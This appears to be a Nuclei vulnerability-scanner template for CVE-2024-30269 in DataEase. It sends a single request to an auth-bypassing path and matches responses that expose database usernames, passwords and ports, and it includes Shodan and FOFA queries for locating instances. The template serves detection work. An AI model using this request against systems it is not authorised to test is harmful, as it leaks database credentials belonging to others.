42 lines
1.6 KiB
YAML
42 lines
1.6 KiB
YAML
id: CVE-2024-30269
|
|
|
|
info:
|
|
name: DataEase <= 2.4.1 - Sensitive Information Exposure
|
|
author: s4e-io
|
|
severity: medium
|
|
description: |
|
|
DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.
|
|
remediation: The vulnerability has been fixed in v2.5.0
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-30269
|
|
- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
|
|
- https://github.com/dataease/dataease
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2024-30269
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09595
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: dataease
|
|
product: dataease
|
|
fofa-query: body="dataease"
|
|
shodan-query: http.html:"dataease"
|
|
tags: cve,cve2024,dataease,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/de2api/engine/getEngine;.js"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "username", "password", "port", "name\":", "pid\":")'
|
|
- 'contains(content_type,"application/json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100dc2c3fd4384082878b35b09b829b1e95ad347aed14419872e646309845a4ee37022100d119e5d05b8b8cca8a88c0aba2499cebd633d4b01bfd0443605c506c5ef9494f:922c64590222798bb761d5b6d8e72950 |